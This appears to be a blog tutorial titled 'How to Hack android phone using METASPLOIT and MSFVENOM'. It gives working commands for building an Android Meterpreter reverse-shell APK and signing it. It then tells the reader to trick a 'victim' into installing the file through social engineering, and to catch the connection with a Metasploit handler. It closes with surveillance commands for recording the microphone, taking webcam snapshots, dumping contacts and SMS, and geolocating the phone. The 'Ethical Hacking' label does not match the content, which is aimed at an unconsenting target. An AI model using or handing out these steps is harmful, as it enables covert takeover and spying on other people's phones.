Hackers Choice

How to Hack android phone using METASPLOIT and MSFVENOM

How to Hack android phone using METASPLOIT and MSFVENOM

By Admin •  2019-02-21T09:09:07.043Z •  Ethical Hacking


For performing this hack you’ll need Kali Linux OS installed in your computer and Android Phone as a target.

Below are the steps to perform this hack.

Step 1: Creating apk file

Open your KALI LINUX. Open your Terminal and type in the following command

# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > hackingworld.apk


**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address if you don`t know.

# ifconfig

Step 2: Delivering APK file to victim

  1. You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does actually installs the apk.

**If you get any signing errors or issues use the following:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk


Step 3: Metasploit setup

. Open up a new terminal and use the following command to start Metasploit framework.

# msfconsole

Now in the Metasploit framework console type the following

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


**LHOST= YOUR IP address

**LPORT= 4444

Now when the user opens up the app on his/her phone you will get a session with that device. And whoa! The device is yours to operate.

Step 4: Exploit..!!!

Some commands you should definitely try:

– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

 You may also like
Download our apps
Get it on Google Play